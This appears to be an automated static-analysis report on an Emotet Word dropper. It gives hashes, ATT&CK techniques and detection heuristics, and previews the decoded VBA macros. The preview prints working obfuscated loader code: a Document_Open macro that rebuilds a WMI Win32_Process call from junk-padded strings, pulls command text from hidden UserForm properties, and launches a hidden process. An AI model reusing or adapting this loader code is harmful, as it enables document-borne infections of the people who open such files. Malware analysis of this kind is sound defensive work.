Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 052d7edc0e371362…

MALICIOUS

Office (OLE)

Size: 179.5 KB | Created: 2020-07-23 21:12:00 | Authoring application: Microsoft Office Word | First seen: 2020-09-15
MD5: 71ebb380a95e2ea9ef5f365b51c9a101
SHA-1: 79377dc78b0ee32943a253ab4f99a96672f07136
SHA-256: 052d7edc0e3713623074a7e629d4005eae2901c9ed7dce61fec770ec23d4db8c
Risk Score: 262

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of Emotet's typical execution flow. The ClamAV detection explicitly names this file as 'Doc.Dropper.EmotetIOS-9402070-0', further supporting the Emotet family attribution. The macro's obfuscated nature and use of CreateObject suggest it is designed to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.EmotetIOS-9402070-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.EmotetIOS-9402070-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager [critical] OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                   Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)      12111 bytes
SHA-256: 949a969eaa81f59a17a931a37b4b667729443757c335dd326b9afc26bad89ee8

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "viejthiofxeiblaup"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
kaehzevloiquyaux
End Sub


Attribute VB_Name = "quauyneafceof"
Attribute VB_Base = "0{BE59704E-9353-4C75-B18F-449F39ABA5BD}{9ADD418C-FB27-4A6F-B8F1-FE9B5036023A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "yilxoiqugoimyeex"
Function kaehzevloiquyaux()
zeedfoochwus = Chr(quauyneafceof.Zoom + (450 / 30))
Dim stARYFOuT 'XOX
stARYFOuT = Replace$("oClwoC", "oCl", "Mfa")
beufnaey = "832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwvw832y2gbjkG&588((((0329y2yHGUI7qwvi832y2gbjkG&588((((0329y2yHGUI7qwvnm832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwvgm832y2gbjkG&588((((0329y2yHGUI7qwvt832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwv" + zeedfoochwus + "832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwv:832y2gbjkG&588((((0329y2yHGUI7qwvw832y2gbjkG&588((((0329y2yHGUI7qwvin832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwv3832y2gbjkG&588((((0329y2yHGUI7qwv2832y2gbjkG&588((((0329y2yHGUI7qwv_832y2gbjkG&588((((0329y2yHGUI7qwv" + quauyneafceof.soalweuccof + "832y2gbjkG&588((((0329y2yHGUI7qwvro832y2gbjkG&588((((0329y2yHGUI7qwv832y2gbjkG&588((((0329y2yHGUI7qwvce832y2gbjkG&588((((0329y2yHGUI7qwvs832y2gbjkG&588((((0329y2yHGUI7qwvs832y2gbjkG&588((((0329y2yHGUI7qwv"
Dim qbmqjX6Ý 'XOX
qbmqjX6Ý = Replace$("KR6âZJ1ÈjSrovBeQcyqeI", "KR6âZJ1ÈjSro", "fM6Ô7Ïqf")
dayyey = lafjeal(beufnaey)
Dim GULahwG 'XOX
GULahwG = Replace$("aXpVIjEADVaciyY", "aXpVIjEAD", "y5ÞDpRmild")
Set feuvvoajboech = CreateObject(dayyey)
Dim bhb 'XOX
bhb = Len("r6ÕYI8ËT8Ôds")
xusxoarmaehqueir = quauyneafceof.xionbeasmaor.ControlTipText
Dim LVaTGhD0åm 'XOX
LVaTGhD0åm = 6
Do While LVaTGhD0åm < 6 + 8
LVaTGhD0åm = LVaTGhD0åm + 4: DoEvents
Loop
guuhlaxqueithheequ = dayyey + zeedfoochwus + quauyneafceof.merbaedzeiv.ControlTipText + xusxoarmaehqueir
Dim pvc6ÛhaN 'XOX
pvc6ÛhaN = 1
Do While pvc6ÛhaN < 1 + 5
pvc6ÛhaN = pvc6ÛhaN + 9: DoEvents
Loop
baifyiec = guuhlaxqueithheequ + quauyneafceof.soalweuccof
Dim JmY6Ø 'XOX
JmY6Ø = 2
Do While JmY6Ø < 2 + 5
JmY6Ø = JmY6Ø + 1: DoEvents
Loop
Set quavwievmeit = weelloy(baifyiec)
Dim LPI 'XOX
LPI = Replace$("OwmlbcTmg3ÉfD6å", "OwmlbcT", "PuE6Ù")
dvse = Array("xxxxxxx", feuvvoajboech. _
Create(peachwoas, seohhiembin, quavwievmeit), "yyyyyyyy")
Dim BMQKvYs 'XOX
BMQKvYs = Replace$("UKKCRXkNjtcYwy", "UKKCRX", "Xa1ÈRSYp")
End Function
Function weelloy(liezfuumzeom)
Set weelloy = CreateObject(liezfuumzeom)
Dim rRPD 'XOX
rRPD = Replace$("HlWD8ße8yOsg", "HlW", "QFEttRXR")
weelloy.showwindow = (nuadther + peetvoimjous) + (leudsoeg + muqutheiytidvait)
Dim d5ÒBUPDf3Âk 'XOX
d5ÒBUPDf3Âk = 6
Do While d5ÒBUPDf3Âk < 6 + 2
d5ÒBUPDf3Âk = d5ÒBUPDf3Âk + 3: DoEvents
Loop
End Function
Function lafjeal(yovcud)
woafkaithkejleap = yovcud
Dim gVUvKCRX 'XOX
gVUvKCRX = Replace$("DgQNfSYpvd", "DgQNf", "yOtgIcYb")
daisboaxdoak = Split(woafkaithkejleap, "832y2gbjkG&588((((0329y2yHGUI7qwv")
Dim SUvTdi 'XOX
SUvTdi = Len("bOLHKnZlGA")
veimzipkaomseim = cdwer + Join(daisboaxdoak, t)
Dim DjtqQNon 'XOX
DjtqQNon = Replace$("WIUnikuEkJesbXa1Ð6ÁWQS", "WIUnikuEkJ", "yTmL8É4ËF")
lafjeal = veimzipkaomseim
Dim B1mPAvPu 'XOX
B1mPAvPu = 2
Do While B1mPAvPu < 2 + 9
B1mPAvPu = B1mPAvPu + 7: DoEvents
Loop
End Function
Function peachwoas()
vfd = quauyneafceof.reujgiekgoechquion.Pages(12 / 12).ControlTipText
Dim aShaq 'XOX
aShaq = 4
Do While aShaq < 4 + 1
aShaq = aShaq + 9: DoEvents
Loop
peachwoas = lafjeal(vfd)
Dim lccTipGOf 'XOX
lccTipGOf = Replace$("QNonddikqkuEkJrR2Ü", "QNonddikq", "oesjWQShR")
End Function


' Processing file: /
... (truncated)